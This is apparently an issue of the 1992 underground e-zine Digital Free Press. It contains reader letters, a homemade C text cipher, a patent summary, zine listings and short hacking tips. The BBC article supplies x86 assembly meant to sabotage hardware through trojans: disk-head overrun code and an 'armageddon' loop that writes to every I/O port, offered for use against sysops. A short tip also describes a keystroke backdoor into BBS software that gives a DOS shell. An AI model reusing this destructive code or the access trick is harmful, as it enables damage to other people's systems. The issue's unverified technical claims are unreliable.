1206 lines
46 KiB
Plaintext
1206 lines
46 KiB
Plaintext
|
||
-------------------------------------------------------------------------------
|
||
|
||
######### ############ #########
|
||
########### ############ ###########
|
||
#### #### #### #### ####
|
||
#### #### #### #### ####
|
||
#### #### ######## ###########
|
||
#### #### ######## #########
|
||
#### #### #### ####
|
||
#### #### #### ####
|
||
########### #### ####
|
||
######### #### ####
|
||
|
||
DIGITAL FREE PRESS
|
||
-------------------------------------------------------------------------------
|
||
Volume 1.0 Issue 4.0
|
||
-------------------------------------------------------------------------------
|
||
|
||
* A Publication of The Underground Computing Foundation (UCF) *
|
||
|
||
* Send Subscription Requests to: dfp-req%underg@uunet.uu.net *
|
||
|
||
* Send Submissions to: hackers%underg@uunet.uu.net *
|
||
|
||
* Editor: Max Cray (max%underg@uunet.uu.net) *
|
||
|
||
Back issues can be found in the CUD archives at ftp.eff.org
|
||
|
||
[Note: BBS is not currently up. Sorry.]
|
||
------------------------------------------------------------------------------
|
||
|
||
Statement of Purpose and Disclaimer
|
||
|
||
The Digital Free Press is an uncensored forum to document current
|
||
activities in and of the world of modern technology. It is published under the
|
||
premise that it is better to know, rather than not know, so no attempt is made
|
||
to hide any information no matter how dangerous it may be. Information is a
|
||
double edged sword. It is neither good nor bad, and can be used for either
|
||
good or bad. Warning: Some information in this document could be used for
|
||
illegal activities. Use at your own risk. Articles are the opinion of the
|
||
authors listed, and not of the editor (unless of course the editor wrote
|
||
it). Information is not verified for accuracy.
|
||
|
||
------------------------------------------------------------------------------
|
||
------------------------------------------------------------------------------
|
||
|
||
In this Issue:
|
||
|
||
1. Mail to Max
|
||
2. Privacy and Electronic Mail by GodNet Raider
|
||
3. Hardware Destructive Code by The BBC
|
||
4. Invisible Killer Chips by Jean-Bernard Condat
|
||
5. Short Takes:
|
||
- Hacking Remote Access by PeeWee
|
||
- Little Black Book of Viruses Review by PeeWee
|
||
- Where to find Online Library Catalogs, and
|
||
How to get info about DEC's new Alpha chip by Wes Morgan
|
||
- Compiling C programs on a VMS system by Max Cray
|
||
6. Paid Advertisement by UPi
|
||
7. FutureCulture (Condensed) by Hawkeye
|
||
|
||
------------------------------------------------------------------------------
|
||
##############################################################################
|
||
------------------------------------------------------------------------------
|
||
|
||
Mail to Max:
|
||
-----------
|
||
|
||
Date: Tue, 28 Apr 92 14:05 GMT
|
||
From: Jean-Bernard Condat <uunet!mcimail.com!0005013469>
|
||
To: Max Cray <underg!max>
|
||
Subject: RE: DFP #3 Bounce Test
|
||
|
||
Dear Max:
|
||
|
||
The scene in France is very clear: nothing. The police look at what the
|
||
Chaos Computer Club france (CCCF) make... and the secret services work
|
||
on several formations for all the people! A lot of anti-virus softwares
|
||
are available, but some softs are sell with viruses in it (!). I paid
|
||
US$1,000 pro week like Craig Neidorf... because I "have perhaps possess
|
||
one hard-to-find NUI"! I mind that the US hacking market is the same:
|
||
you have some blue box codes available, the French hackers have some
|
||
"Carte Pastel Internationale" codes... and France Telecom don't make any
|
||
thing against that. Only some poor teenagers are arrested, but in 60%,
|
||
they don't found the good people!
|
||
|
||
Can I help you?
|
||
|
||
Jean-Bernard Condat, General Secretary, CCCF
|
||
B.P. 8005
|
||
69351 Lyon Cedex 08, France
|
||
|
||
[Editor's note: Of course you can help! Send all your information to:
|
||
hackers%underg@uunet.uu.net and I will try to edit it
|
||
to make it even more useful, and then I will publish
|
||
it in the DFP!]
|
||
|
||
-----------------------------------------------------------------------------
|
||
|
||
From: Root of all Evil Account <uunet!stormking.com!root>
|
||
Subject: Re: Digital Free Press #3
|
||
To: underg!max (Max Cray)
|
||
Date: Sun, 26 Apr 92 19:38:24 EDT
|
||
X-Mailer: ELM [version 2.3 PL11]
|
||
|
||
Dear Mr. Cray,
|
||
|
||
Recently, 4 users of this system complained about receiving
|
||
copies of your "Digital Free Press". As the distribution site for Phrack,
|
||
I in no way discourage freedom of electronic speech. I do, however,
|
||
discourage "cyber junk-mail". Each of the users mentioned they had not
|
||
specifically asked for this to be sent to them.
|
||
|
||
In the future, please verify any subscriptions of your newsletter
|
||
through me.
|
||
|
||
The Root of all Evil at StormKing.Com
|
||
|
||
[Editor's note: 'Mr. Cray' ... I like that!]
|
||
|
||
------------------------------------------------------------------------------
|
||
##############################################################################
|
||
------------------------------------------------------------------------------
|
||
|
||
From: gnr@tsf.UUCP (GodNet Raider)
|
||
Date: Wed, 26 Feb 92 05:17:53 EST
|
||
Organization: The CyberUnderground
|
||
|
||
|
||
-=[ Privacy and electronic mail ]=-
|
||
|
||
-or-
|
||
|
||
/*************************************/
|
||
/* How to whisper over a crowded net */
|
||
/*************************************/
|
||
|
||
- written by -
|
||
GodNet Raider
|
||
- of -
|
||
The CyberUnderground
|
||
|
||
-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
|
||
|
||
]----------------------------------------------------------------------------[
|
||
|
||
Introduction:
|
||
-------------
|
||
|
||
A while back I was listening to a pro password sysop talk about the
|
||
'evils' of hacking. His biggest point was that 'a hacker could read
|
||
private mail from/to the person whose' account they have accessed. The
|
||
right or wrong of that point I will leave to others to discuss/flame/get
|
||
flamed over. What stuck with me was the fact that he like many other
|
||
sysops and system admin, their friends and whoever else can access the
|
||
system at high level (or in the case of DOS, can pound the local
|
||
keyboard), can also read any text messages they wish. Some even feel that
|
||
it is a god given right to read any mail, strange seeing that the
|
||
government and even ma bell (remember the phone chase from _the_cuckoo_
|
||
nest_ they could not get the phone number for they did not have a valid
|
||
warrant in in that state) must get a search WARRANT to do the same thing.
|
||
Well it seems what they feel god has giveth them, GodNet Raider can
|
||
taketh away.
|
||
|
||
So I thought there must be a simple way to make truly private
|
||
messages to protect all from this 'hacker threat' and nosey sysops
|
||
(etc..) as well (without having to resort to using DES and uuencode,
|
||
for it is slow and a bit of a hassle to use a lot (but it should be noted
|
||
this is the most secure method). Then I remembered an article I read
|
||
in The LOD/H Technical Journal, Issue #3. [Editor's note: The Legion
|
||
of Doom Technical Journals can be found in the CUD archives at
|
||
ftp.eff.org. Highly recommended.] It contained a basic BASIC
|
||
program and explanation to a simple text encryption method using
|
||
cellular automatons by The Mentor (strongly recommended reading for
|
||
understanding the theory behind the method).
|
||
|
||
After converting the BASIC code for the second program to C (under
|
||
Minix) I proceeded to make changes to (hopefully improve) it. What
|
||
I came up with is included at the end of this file (MsgLock.c).
|
||
|
||
Of the changes made:
|
||
|
||
Added the use of stdin/stdout to support a wide extent of I/O
|
||
methods.
|
||
|
||
Used multiple cells in defining shift amount.
|
||
|
||
Allowed the pass though of char.s not in aszValid array (raw
|
||
output) to keep message integrity (returns and tabs that a
|
||
message may gain/lose in some online editors).
|
||
|
||
Added code to expand small key strings to fill out key cells.
|
||
|
||
So I hope you find MsgLock of use and remember...
|
||
|
||
WMIe`H-h(`[ga0)9oW-/V
|
||
|
||
MsgLock wish list/projects:
|
||
---------------------------
|
||
|
||
MsgLock is by no means complete following are some suggestions for
|
||
the obsessed prodigies out there who want to expand on the basic idea.
|
||
|
||
For a more private version one can change:
|
||
|
||
The size of the key cells (#define WIDTH xx).
|
||
|
||
The expansion methods used to fill out the initial key cells.
|
||
|
||
The key cell update method.
|
||
|
||
The order of the char.s in aszValid.
|
||
|
||
Adding/removing char.s from aszValid.
|
||
|
||
Msglock could use a way to know when an encoded area begins and
|
||
ends (like the 'begin'/'end' in uuencoded files) to save post
|
||
processing on net messages.
|
||
|
||
Removal of char.s used in quoted messages so that it will not try
|
||
to process (cook) char.s added to quoted messages.
|
||
|
||
Changes to allow it to be treated like a ASCII Xfer protocol in
|
||
term packages (qmodem, boyan, kermit)/online by bbs packages (RBBS,
|
||
etc..) as an auto encrypt for chat/general online use.
|
||
|
||
Or many others I have not thought of.
|
||
|
||
MsgLock source code:
|
||
--------------------
|
||
|
||
MsgLock was compiled in Minix using the ACK compatible compiler and
|
||
under DOS using Turbo C++ using ANSI C compatible commands.
|
||
|
||
Usage:
|
||
msglock [-d] Key
|
||
|
||
-d(code) : Decode stdin to stdout (MsgLock otherwise
|
||
encodes stdin to stdout. -d is only
|
||
used for decoding if followed by a
|
||
space and is the first parameter following
|
||
the command ('-dKEY' will be used as a key
|
||
to encode stdin, use '-d -dKEY' instead to
|
||
decode)
|
||
|
||
Key : String of char. used to encode/decode stdin
|
||
to stdout. String can contain spaces.
|
||
|
||
Examples:
|
||
|
||
msglock key <file1.txt >file2.txt
|
||
Encode file 'file1.txt' to 'file2.txt' using the key string
|
||
'key'.
|
||
|
||
msglock -d this is the key <foo
|
||
Decode the file 'foo' to the screen using 'this is the key'
|
||
as the key string.
|
||
|
||
msglock knowledge is power >com1 (/dev/tty1 for minix users)
|
||
Encode keyboard input (using the key 'knowledge is power')
|
||
directly to the device/terminal on com port 1.
|
||
|
||
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
|
||
|
||
/*
|
||
MsgLock.c
|
||
by GodNet Raider.
|
||
Based on a program for encrypting using cellular automaton
|
||
by The Mentor
|
||
|
||
Allows encoding of text for transmittal over computer nets and BBSs.
|
||
|
||
This program is not to DES standards and should not be considered 100%
|
||
secure by any means.
|
||
*/
|
||
|
||
#include <stdlib.h>
|
||
#include <string.h>
|
||
#include <stdio.h>
|
||
#include <ctype.h>
|
||
|
||
#define TRUE 1
|
||
#define FALSE 0
|
||
#define SPACE 0x20
|
||
#define WIDTH 50
|
||
#define MAX_CELLS (WIDTH + 2)
|
||
|
||
char
|
||
*aszErrMsg [] =
|
||
{
|
||
"Usage: msglock [-d(ecode)] Key",
|
||
"Write error on stdout.",
|
||
"Read error on stdin."
|
||
},
|
||
asCells [2] [MAX_CELLS],
|
||
/* Not using 0 offset to prevent errors caused by the fact that */
|
||
/* (0 % x == x % x). */
|
||
aszValid [] = "\xff\ABCDEFGHIJKLMNOPQRST"
|
||
"yz1234567890!@#$%^&*()-=_+[]{};:'.><,/?\\| \`\"",
|
||
fActive = 0,
|
||
fDecode = FALSE;
|
||
|
||
void
|
||
main (int, char **),
|
||
FatalErr (int);
|
||
|
||
void main (argc, argv)
|
||
int
|
||
argc;
|
||
char
|
||
*argv [];
|
||
{
|
||
char
|
||
sWorkKey [WIDTH],
|
||
cInChar;
|
||
int
|
||
nArgCnt = 1,
|
||
nTmpCnt1 = 1,
|
||
nTmpCnt2 = 0,
|
||
nValidSize;
|
||
|
||
nValidSize = strlen (aszValid) - 1;
|
||
/* Check for missing parameters. */
|
||
if (argc == 1)
|
||
FatalErr (1);
|
||
/* Check if decode, else default to encode */
|
||
if (*argv [1] == '-' && toupper (argv [1] [1]) == 'D' && !argv [1] [2])
|
||
{
|
||
/* Check for missing parameters, again. */
|
||
if (argc < 3)
|
||
FatalErr (1);
|
||
fDecode = TRUE;
|
||
nArgCnt++;
|
||
}
|
||
/* Move key in to encode/decode key cells to the max set by WIDTH. */
|
||
while (nTmpCnt1 <= WIDTH && nArgCnt < argc)
|
||
if (argv [nArgCnt] [nTmpCnt2])
|
||
asCells [1] [nTmpCnt1++] =
|
||
argv [nArgCnt] [nTmpCnt2++];
|
||
else
|
||
if (++nArgCnt < argc)
|
||
{
|
||
asCells [1] [nTmpCnt1++] = SPACE;
|
||
nTmpCnt2 = 0;
|
||
}
|
||
nTmpCnt2 = 1;
|
||
/* Fill unused cells in key cells up to WIDTH. */
|
||
while (nTmpCnt1 <= WIDTH)
|
||
asCells [1] [nTmpCnt1++] = asCells [1] [nTmpCnt2++] ^
|
||
asCells [1] [nTmpCnt1 - 1];
|
||
/* Process stdin. */
|
||
while ((cInChar = (char) getc (stdin)) != EOF)
|
||
{
|
||
/* Check if char. is in aszValid list, if so cook, */
|
||
/* else let it pass though raw. */
|
||
nTmpCnt2 = nValidSize;
|
||
while (nTmpCnt2 && aszValid [nTmpCnt2] != cInChar)
|
||
nTmpCnt2--;
|
||
if (nTmpCnt2)
|
||
{
|
||
/* Update key cells, excluding head and tail. */
|
||
for (nTmpCnt1 = 1; nTmpCnt1 <= WIDTH; nTmpCnt1++)
|
||
asCells [fActive] [nTmpCnt1] =
|
||
asCells [fActive ^ 1] [nTmpCnt1 - 1] ^
|
||
(asCells [fActive ^ 1] [nTmpCnt1] |
|
||
asCells [fActive ^ 1] [nTmpCnt1 + 1]);
|
||
/* Update head of key cells. */
|
||
asCells [fActive] [0] =
|
||
asCells [fActive ^ 1] [WIDTH + 1] ^
|
||
(asCells [fActive ^ 1] [0] |
|
||
asCells [fActive ^ 1] [1]);
|
||
/* Update tail of key cells. */
|
||
asCells [fActive] [WIDTH + 1] =
|
||
asCells [fActive ^ 1] [WIDTH] ^
|
||
(asCells [fActive ^ 1] [WIDTH + 1] |
|
||
asCells [fActive ^ 1] [0]);
|
||
/* Get char shift offset value */
|
||
cInChar = (asCells [fActive] [1] & 0x7f) % WIDTH;
|
||
/* Get char shift value */
|
||
cInChar = asCells [fActive] [(cInChar ? cInChar : WIDTH)];
|
||
/* Switch to updated key cells for next pass. */
|
||
fActive ^= 1;
|
||
/* If decode is TRUE then shift left though aszValid, else */
|
||
/* shift right (negative numbers in cInChar reverses this). */
|
||
if (fDecode)
|
||
{
|
||
/* Needed to bypass warning message (turbo C++ gets */
|
||
/* confused sometimes when it sees a single '=' in */
|
||
/* an 'if' statement, even though it is bracket to be */
|
||
/* evaluated before the 'if'). */
|
||
#ifdef __TURBOC__
|
||
if ((cInChar = nTmpCnt2 - cInChar) != 0)
|
||
#else
|
||
if ((cInChar = nTmpCnt2 - cInChar))
|
||
#endif
|
||
{
|
||
if ((cInChar %= nValidSize) < 1)
|
||
cInChar = nValidSize + cInChar;
|
||
}
|
||
else
|
||
cInChar = nValidSize;
|
||
}
|
||
else
|
||
if (!(cInChar = (nTmpCnt2 + cInChar) % nValidSize))
|
||
cInChar = nValidSize;
|
||
/* Write cooked char. to stdout. */
|
||
if (putc (aszValid [cInChar], stdout) == EOF &&
|
||
ferror (stdout))
|
||
FatalErr (2);
|
||
}
|
||
else
|
||
/* Write raw char. to stdout. */
|
||
if (putc (cInChar, stdout) == EOF && ferror (stdout))
|
||
FatalErr (2);
|
||
}
|
||
/* Check for file error on stdin. */
|
||
if (ferror (stdin))
|
||
FatalErr (3);
|
||
/* End program run. */
|
||
exit (0);
|
||
}
|
||
|
||
void FatalErr (ErrNum)
|
||
int
|
||
ErrNum;
|
||
{
|
||
/* In every life a little rain must fall. */
|
||
/* Complain and bail out. */
|
||
fprintf (stderr, "\n%s\n", aszErrMsg [ErrNum - 1]);
|
||
exit (ErrNum);
|
||
}
|
||
|
||
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
|
||
|
||
]============================================================================[
|
||
|
||
...uunet!underg!tsf!gnr (GodNet Raider)
|
||
-=[ "You gotta learn to listen, before you learn to play." ]=-
|
||
|
||
------------------------------------------------------------------------------
|
||
##############################################################################
|
||
------------------------------------------------------------------------------
|
||
|
||
To: hackers@tsf.UUCP
|
||
Subject: Text phile 5.
|
||
From: bbc@tsf.UUCP (The BBC)
|
||
Organization: The CyberUnderground
|
||
|
||
Da da.. da da dup... Da da.. da da dup... Da da.. da da dup...
|
||
Yes boys and girls... It time once again for your favorite waste
|
||
of humanity... Yes it the BBC's Hackit J. Squirrel and crashwinkel
|
||
The moose show... So put your antlers on and lets now go to the
|
||
magical land of frostbite Falls Min. An see what our heroes are up
|
||
to...
|
||
|
||
Golly gee Hack... Every time I crash a sysops hard drive with
|
||
a trojan... they just reformat the drive and reinstall the
|
||
software and are up and running again... I wish there was a way
|
||
to bring them down that would really give them something to think
|
||
about...
|
||
|
||
Maybe there is lets go see Mr. Woopie and his 3D BBC,
|
||
crashwinkel...
|
||
|
||
So our HEROES went to see Mr. Woopie... But where confronted
|
||
by Tennessee tuxedo and his friend chumly... But a quick squeeze
|
||
of the trigger on their semi automatic weapons and a short thank
|
||
you note to the NRA... An they where in...
|
||
|
||
So you boys want to know how to cause more than just data loss
|
||
with trojans? Well lets ask the 3D BBC...
|
||
|
||
Thank you Mr. Woopie... It sounds like you boys want to hear
|
||
about how to force hardware problems using software... 'Wow
|
||
Hacket.I only thought you could only do major data loss with
|
||
trojans.'... Yes but there are other nasties you could pull if you
|
||
want to...
|
||
|
||
Take this simple bit of code for example:
|
||
|
||
===============================================================
|
||
mov Ax, 0508h
|
||
mov CX, 8001h
|
||
mov DX, 0000h
|
||
int 13
|
||
===============================================================
|
||
|
||
This small bit of codes just moves the disk heads past the inner
|
||
most track... 'But what good is that BBC?'... Well our furry little
|
||
friend... Some disks will lock and the only way to fix it is to open
|
||
the bugger up... An since the only way to be sure this will or won't
|
||
work is to try it... Well...
|
||
|
||
Or how about this bit of code:
|
||
|
||
===============================================================
|
||
xor Al, Al
|
||
NextPass:
|
||
mov DX,ffffh
|
||
NextPort:
|
||
out DX, AL
|
||
dec DX
|
||
jnz NextPort
|
||
inc AL
|
||
jmp short NextPass
|
||
===============================================================
|
||
|
||
We like to call it armageddon... 'Ohhh, Ahhhh'... It simply
|
||
looks for and writes to every port in the system... An based
|
||
on the hardware in the system it can... Toast monitors, Change CMOS
|
||
values, Change stepper rates, Change voltages (to burn/disable cards,
|
||
boards, and memory), Reek havoc on co-processers, Disable networks,
|
||
As well as other nasties too numerous to mention... Seeing that there
|
||
is some time involved in writing all those ports... The poor fool
|
||
has some time to guess what is going on and shut the computer down
|
||
(oh about 4 min.)... 'But we can't test things like that on our
|
||
computers.' 'How will we know if it will work or not.'... Who said
|
||
to test it on your systems... Not that we would suggest you test
|
||
it on others systems... That would make you a wast of humanity
|
||
like...
|
||
|
||
The BBC
|
||
|
||
----------------------------------------------------------------------
|
||
...uunet!galaxia!divinity!tsf!bbc (The BBC)
|
||
-=[ "Anarchy is never HAVING to say you're sorry." ]=-
|
||
|
||
------------------------------------------------------------------------------
|
||
##############################################################################
|
||
------------------------------------------------------------------------------
|
||
|
||
Invisible Killer Chips Now Available
|
||
|
||
|
||
Intelligence Newsletter (10 rue du Sentier, 75002 Paris, France)
|
||
No. 186 (Jan. 29, 1992), page 2, ISSN 0997-7139
|
||
By: Jean-Bernard Condat (CCCF, B.P. 8005, 69351 Lyon Cedex 08, France)
|
||
|
||
|
||
The military use of computer viruses is often overblown, if not just
|
||
simple disinformation as in the recent Iraqi case. But researchers at
|
||
Boston University have developed and patented (U.S. patent 5 049 775)
|
||
an infinitely more offensive and effective anti-computer agent: the
|
||
silicon ant. Micro-electronics has perfected technologies for making
|
||
toys and machines so small that they are invisible.
|
||
|
||
Using piezoelectric ceramics which expand or contract under an
|
||
electric current, the researchers constructed a microscopic ship with
|
||
three "legs" on each side and a "cutter" in front. By alternating
|
||
current in different sides of each "leg", it bends forward or backward.
|
||
|
||
Under remote control the killer chips can be "walked" into a computer
|
||
and cut up other microscopic chips, turn around and "walk" away, leaving
|
||
invisible damage in the computer system. The killer chips could be solar
|
||
powered and therefore have an indefinite life-span.
|
||
|
||
|
||
PATENT DESCRIPTION
|
||
|
||
|
||
008245420 WPI Acc No: 90-132421/17
|
||
XRPX Acc No: N90-102550
|
||
Piezoelectric micro-machine or robot basic operating unit - made by
|
||
covering silicon cantilever beams projecting from frame with
|
||
piezoelectric material when applied voltages cause them to deflect
|
||
Patent Assignee: (UYBO-) BOSTON UNIV
|
||
Author (inventor): SMITS J G
|
||
Number of Patents: 002
|
||
Patent Family:
|
||
CC Number Kind Date Week
|
||
WO 9003665 A 900405 9017 (Basic)
|
||
US 5049775 A 910917 9140
|
||
Priority Data (CC,No,Date): US 251565 (880930);
|
||
Applications (CC,No,Date): WO 89US4129 (890921);
|
||
EP and/or WO Language: English
|
||
EP and/or WO Cited Patents:
|
||
No.SR.Pub
|
||
Designated States (National): JP (Regional): AT; BE; CH; DE; FR; GB; IT; LU
|
||
; NL; SE
|
||
|
||
Abstract (Basic): WO 9003665
|
||
|
||
An electrical micromachine is made by securing films (20,22) of
|
||
piezoelectric material to the top surfaces (16,18) of crystalline
|
||
silicon beams (12,14) projecting from a crystalline silicon body (10)
|
||
to form a bimorph structure. A potential applied across the ends
|
||
(24,26) of the piezoelectric films causes the beams to deflect. The
|
||
piezoelectric material used is zinc oxide.
|
||
A number of such micromachines can be assembled to form a robot,
|
||
and when a foot (30) is provided the machine can move itself along a
|
||
surface by sequential deflecting and straightening of the beams. The
|
||
foot can be associated with a toothed wheel to produce rotary motion.
|
||
The micromachine may be solar powered, and can be associated with
|
||
sensors or a microprocessor with programmable memory.
|
||
USE - Microsurgical tools, and robots for grasping, carrying or
|
||
cutting tasks. @(33pp Dwg.No.1/10)@
|
||
|
||
Abstract (US): 9140 US 5049775
|
||
|
||
The piezoelectric actuation machine comprises two cantilever beams
|
||
extending from a frame. The beams comprise a piezoelectric material
|
||
such that application of an electric potential across the material of
|
||
each beam rotationally diplaces the first and second beams relative to
|
||
each other.
|
||
An actuating member is secured between displaceable surfaces on
|
||
the beams and extends orthogonally from a plane through the beams such
|
||
that relative displacement of the beams displaces a portion of the
|
||
member in a direction orthogonal to beam displacement. A rigid object
|
||
contacting the displaced portion of the member is translated relative
|
||
to the member and the frame.
|
||
USE - For piezoelectric micromachines e.g. small robot or cutting
|
||
tool. @(17pp)@
|
||
|
||
File Segment: EPI
|
||
Derwent Class: S05; V06; X25; R46;
|
||
Int Pat Class: H01L-041/09
|
||
Manual Codes (EPI/S-X): S05-B; V06-M06D; X25-A03E
|
||
|
||
|
||
Jean-Bernard Condat
|
||
General Secretary
|
||
Chaos Computer Club France
|
||
B.P. 8005
|
||
69351 Lyon Cedex 08, France
|
||
Tel.: +33 78 61 15 88
|
||
<uunet!mcimail.com!0005013469>
|
||
|
||
------------------------------------------------------------------------------
|
||
##############################################################################
|
||
------------------------------------------------------------------------------
|
||
|
||
Short Takes:
|
||
-----------
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
From: uunet!uga.cc.uga.edu!ART30275%NUSVM.BITNET (PeeWee)
|
||
|
||
Hey, press alt-200 (on the numberpad) to access the highest level
|
||
menu in Remote Access v1.10. Often lets u shell out to DOS.
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
From: uunet!CUNYVM.CUNY.EDU!ART30275%NUSVM.bitnet (PeeWee)
|
||
|
||
Hey! have you got your copy of The little black book of
|
||
Computer viruses yet?
|
||
|
||
It's very detailed and good! I had to order it and have it
|
||
shipped over here to me, took me about 3 months (worth the wait!)
|
||
The ISBN is 0-929408020 Author: Mark Ludwig, Publisher: American Eagle
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
From: Wes Morgan <uunet!engr.uky.edu!morgan>
|
||
|
||
Obligatory Information Pointers:
|
||
|
||
List of Online Library Catalogs:
|
||
Anonymous ftp from ftp.unt.edu (129.120.1.1) in directory /pub/library.
|
||
Versions are available in plaintext, PostScript, and WordPerfect 5.0.
|
||
|
||
[Editor's note: With these lists of online library catalogs you can find out
|
||
much information by learning what libraries have the info
|
||
that you need, and then requesting it via an inter-library
|
||
loan.]
|
||
|
||
DEC's new Alpha chip (for you hardware fanatics):
|
||
Call 1-800-332-2717 and ask for the "Alpha Packet". They'll send you
|
||
the Architecture Handbook (detailed) and more information about the
|
||
Alpha chip.
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
From: Max Cray <max%underg@uunet.uu.net>
|
||
|
||
On a VMS system you can not simply type 'CC HELLO.C' to compile a C
|
||
program. First you have to define a Link Library. This command will work
|
||
for a generic program that does not need floating point:
|
||
|
||
DEFINE LNK$LIBRARY SYS$LIBRARY:VAXCRTL
|
||
|
||
For more information use the excellent help system in VMS. Simply Type
|
||
'HELP CC'.
|
||
|
||
------------------------------------------------------------------------------
|
||
##############################################################################
|
||
------------------------------------------------------------------------------
|
||
|
||
PAID POLITICAL ADVERTISEMENT
|
||
|
||
UPi has once again returned and it no longer the shit group it used to be in
|
||
the past. UPi is a group that puts out newsletters that deals with the
|
||
H/P/C/A world. In the past, our newsletters averaged only 1 article in length
|
||
(which in size means a range of 25-50k) but now in the all new UPi newsletter
|
||
we have decided to expand it so it will contain more articles (and all quality
|
||
articles which means no more of those little shitty files that contains
|
||
useless information). What we are looking for are quality members and sites
|
||
that are willing to contribute to the group and support the group. We are
|
||
also looking for people who can freelance write for us too. We are looking
|
||
for people who are experienced in electronics and chemistry, and as well as
|
||
any of the P/H/C/A topics. If you would like to join UPi either as a site or
|
||
a member or become a freelance writer for us please send mail to The Lost
|
||
Avenger via internet e-mail to the following address Tla@Maria.Wustl.Edu or
|
||
you can contact him on his voice mail box at 416-402-0788.
|
||
|
||
The Lost Avenger/UPi
|
||
|
||
------------------------------------------------------------------------------
|
||
##############################################################################
|
||
------------------------------------------------------------------------------
|
||
|
||
From: uunet!isis.cs.du.edu!ahawks (floyd)
|
||
Subject: FutureCulture Update
|
||
To: hackers%underg@uunet.uu.net
|
||
Date: Tue, 12 May 92 20:38:20 MDT
|
||
|
||
[Editor's note: This is an edited version of Hawkeye's excellent e-mail
|
||
FutureCulture listing. It is intended to deal with the entire CyberPunk/Rave
|
||
scene and thus is rather large and comprehensive. I edited out most of the
|
||
cultural listings, and left most of the tech listings, since I intend for
|
||
the DFP to be more of a technical journal. However it is highly recommended
|
||
that you send him mail and get on the mail list.]
|
||
|
||
_____________________________________________________________________________
|
||
| |
|
||
| Magazines (hardcopy) of interest: |
|
||
|_____________________________________|
|
||
|
||
Communications of the ACM
|
||
(Association for Computing Machinery, Inc.)
|
||
-sorry, don't have the address or subscription info, but should be
|
||
available at any decent newsstand - also, the ACM has forums
|
||
available on the Internet
|
||
|
||
Cybertek
|
||
OCL/Magnitude
|
||
PO Box 64
|
||
Brewster, NY 10509
|
||
-hacking, cyberpunks, technology, culture
|
||
$10 a year
|
||
|
||
Fact Sheet Five
|
||
6 Arizona Avenue
|
||
Rensselaer, NY 12144-4502
|
||
518.479.3707
|
||
-independently-oriented reviewers of the culture
|
||
$3.50 an issue, $33 a year for 8 issue subscriptions
|
||
(unconfirmed rumors say it's no longer in production)
|
||
|
||
Hac-Tic
|
||
pb 22953, 1100 DL
|
||
Amsterdam, The Netherlands
|
||
ropg@ooc.uva.nl (Internet)
|
||
-published near that hotbed of hackers in holland/amsterdam
|
||
European counterpart to 2600
|
||
$2.30 US an issue
|
||
|
||
[Editor's note: The above is not in English! Is there a translator?]
|
||
|
||
Intertek: The Cyberpunk Journal
|
||
Steve Steingerg
|
||
325 Ellwood Beach #3
|
||
Goleta, CA 93117
|
||
steve@cs.ucsb.edu
|
||
-formerly Frank Drake's W.O.R.M
|
||
hacking, cyberspace, interviews, designer drugs, cryonics, etc.
|
||
$2.50 an issue
|
||
|
||
Iron Feather Journal
|
||
PO Box 1905
|
||
Boulder, CO 80306
|
||
-hacking, anarchy, techno-phun
|
||
$2 an issue
|
||
|
||
Mondo 2000
|
||
PO Box 10171
|
||
Berkeley, CA 94709
|
||
415.845.9018 (phone)
|
||
415.649.9630 (fax)
|
||
mondo2000@mcimail.mci.com
|
||
-your definitive guide to all things cyberpunk and some things not
|
||
should be available at any decent newsstand
|
||
was Reality Hackers and High Frontiers
|
||
$21 for 5 issues (published quarterly)
|
||
|
||
TAP
|
||
PO Box 20264
|
||
Louisville, KY 40250
|
||
-the original phreaker's rag, begun by Abbie Hoffman
|
||
formerly YIPL (Youth International Party Line) and then it was
|
||
Technilogical Assistance Program, now it's
|
||
Technilogical Advancement Party
|
||
hacking, anarchy, some political
|
||
has undergone many publishing changes
|
||
operates Blitzkrieg BBS @ 502.499.8933
|
||
TAP-Online also available on some BBSes / FTP sites
|
||
|
||
2600
|
||
PO Box 752
|
||
Middle Island, NY 11953-0752
|
||
516.751.2600 (office)
|
||
516.751.2608 (fax)
|
||
2600@well.sf.ca.us (Internet)
|
||
-the original infamous hacker's zine
|
||
subscriptions are $21 for 4 issues (published quarterly)
|
||
back issues are $25 / year
|
||
|
||
[Editor's note: They also have meetings on the first friday of the month in
|
||
New York City.]
|
||
|
||
Whole Earth Review
|
||
PO Box 38
|
||
Sausalito, CA 94966-9932
|
||
(Whole Earth runs The Well [Whole Earth Lectronic Link] - well.sf.ca.us)
|
||
-combines new age, techno-culture, california fads, etc.
|
||
should be available at any decent newsstand
|
||
$20 year for subscriptions
|
||
|
||
____________________________________________________________________________
|
||
| |
|
||
| E-Magazines and digests: |
|
||
|_____________________________|
|
||
|
||
[Editor's note: I edited out the listings that did not have references on how
|
||
to get them. Suffice it to say that there are many more journals available
|
||
that are not listed here. See some of the Internet and BBS listings for
|
||
places to find these items.]
|
||
|
||
Activist Times Incorporated
|
||
gzero@tronsbox.xei.com
|
||
-political, hacking, anarchy
|
||
|
||
Computers and Academic Freedom
|
||
listserv@eff.org <add comp-academic-freedom-news>
|
||
-computing freedom, mostly deals with college campuses
|
||
|
||
Computer Underground Digest
|
||
tk0jut2@niu.bitnet
|
||
|
||
Digital Free Press
|
||
dfp-req%underg@uunet.uu.net
|
||
-hacking, information, etc.
|
||
|
||
EFF News (EFFector Online)
|
||
effnews-request@eff.org
|
||
-sends out EFFector Online, the Electronic Frontier foundation's
|
||
e-journal
|
||
|
||
Freaker's Bureau International
|
||
au530@cleveland.freenet.edu
|
||
-anarchy, hacking, cyberpunk
|
||
|
||
Informatik
|
||
inform@doc.cc.utexas.edu
|
||
-hacking, phreaking, computer underground, cyberpunk, etc.
|
||
|
||
Network Information Access
|
||
nia@nuchat.sccsi.com
|
||
-hacking, computer underground, etc.
|
||
|
||
Phantasy
|
||
Mercenary@f515.n141.z1.fidonet.org
|
||
-anarchy, hacking
|
||
|
||
Phrack
|
||
phracksub@stormking.com
|
||
-need we say more - the one, the only hacking e-zine...
|
||
|
||
Pirate Radio
|
||
brewer@ace.enet.dec.com
|
||
-pirate radio
|
||
|
||
RISKS Digest
|
||
risks-request@csl.sri.com
|
||
-the RISKS of computing in our lives
|
||
|
||
Telecom Privacy Digest
|
||
